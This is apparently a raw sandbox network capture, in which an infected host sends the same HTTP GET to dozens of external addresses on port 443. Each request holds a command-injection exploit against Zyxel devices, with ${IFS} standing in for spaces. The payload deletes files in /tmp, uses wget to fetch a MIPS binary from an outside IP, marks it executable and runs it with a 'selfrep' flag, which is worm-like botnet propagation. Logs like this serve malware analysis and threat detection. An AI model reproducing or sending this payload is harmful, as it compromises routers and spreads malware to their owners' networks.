                                        Jan 14, 2024 16:18:39.330605030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2794192.168.2.1360382133.202.112.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330657959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2795192.168.2.1343632150.156.90.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330719948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2796192.168.2.1357208143.251.192.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330763102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2797192.168.2.1356742221.6.59.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330826044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2798192.168.2.1352780153.40.167.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330883980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2799192.168.2.1347736166.147.48.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330954075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2800192.168.2.1346904194.200.114.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.330982924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2801192.168.2.134368667.59.54.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331051111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2802192.168.2.1333834208.168.84.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331104994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2803192.168.2.1354632121.194.127.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331168890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2804192.168.2.1357568125.153.200.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331209898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2805192.168.2.1353786117.188.37.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331259966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2806192.168.2.1338214193.239.143.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331319094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2807192.168.2.135361664.139.122.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331372023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2808192.168.2.1333414112.53.9.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331413984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2809192.168.2.1351514115.189.223.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331474066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2810192.168.2.1350060128.28.123.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331528902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2811192.168.2.1338580138.54.150.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331588030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2812192.168.2.134776252.82.255.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331644058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2813192.168.2.1356268143.80.154.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331686020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2814192.168.2.1337100193.179.79.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331727028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2815192.168.2.1350372173.62.198.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331794024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2816192.168.2.133988866.231.252.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331845045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2817192.168.2.134025848.197.148.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331903934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2818192.168.2.1341254128.229.247.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.331962109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2819192.168.2.1336784176.125.181.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332019091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2820192.168.2.1333522132.37.103.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332081079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2821192.168.2.134214032.62.206.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332106113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2822192.168.2.1342588104.116.73.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332169056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2823192.168.2.134420859.193.141.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332232952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2824192.168.2.1332832121.221.77.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332287073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2825192.168.2.1344032158.112.140.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332329988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2826192.168.2.133394242.33.103.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332382917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2827192.168.2.134511454.0.99.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332439899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2828192.168.2.1340388153.24.36.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332485914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2829192.168.2.135935698.97.57.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332528114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2830192.168.2.1341342107.227.45.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332596064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2831192.168.2.1335692164.139.38.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332626104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2832192.168.2.1349656164.106.224.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332669020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2833192.168.2.1343378220.74.221.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332730055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2834192.168.2.1350108108.115.174.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332788944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2835192.168.2.1356314130.182.213.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332856894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2836192.168.2.1353874139.22.252.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332937002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2837192.168.2.13483181.174.83.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.332988977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2838192.168.2.1358872104.21.211.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333028078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2839192.168.2.1351072193.196.132.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333107948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2840192.168.2.133342048.7.157.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333163977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2841192.168.2.133363235.12.190.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333233118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2842192.168.2.13479142.80.82.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333249092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2843192.168.2.1334068112.5.202.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333292961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2844192.168.2.134853866.154.8.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333358049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2845192.168.2.1346196210.120.227.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333411932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2846192.168.2.1354652101.41.128.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333461046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2847192.168.2.134401291.97.79.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333532095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2848192.168.2.1352688169.65.58.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333590984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2849192.168.2.135358662.255.47.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333631992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2850192.168.2.1338268146.165.207.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333714962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2851192.168.2.135494682.84.75.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333738089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2852192.168.2.134726098.101.251.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333775997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2853192.168.2.134147857.123.248.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333839893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2854192.168.2.136021831.125.92.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333894968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2855192.168.2.1356392170.193.228.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.333925962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2856192.168.2.134125224.224.45.166443
                                        TimestampBytes transferredDirectionData
